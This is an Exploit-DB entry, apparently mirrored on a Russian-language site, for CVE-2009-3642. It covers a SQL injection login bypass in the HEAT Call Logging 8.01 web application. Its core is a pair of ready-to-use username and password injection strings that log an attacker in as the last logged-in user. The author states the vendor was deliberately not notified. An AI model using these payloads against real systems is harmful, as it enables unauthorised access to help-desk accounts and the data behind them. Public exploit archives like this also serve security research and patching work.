- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9809
- Проверка EDB
-
- Пройдено
- Автор
- 0 0
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2009-3642
- Дата публикации
- 2009-09-28
Код:
[=[ ;otokoyama; ]=]
-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."
-=[web]=-
http://www.frontrange.com/heat.aspx
-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '
-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.
-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.
I guess this is a 0-day then..
Via their webpage current version appears to be 9.0,
could apply to this version aswell
SHOUTS:4chan for being shit, yes I will troll in a POC.
antilimit owns you- Источник
- www.exploit-db.com
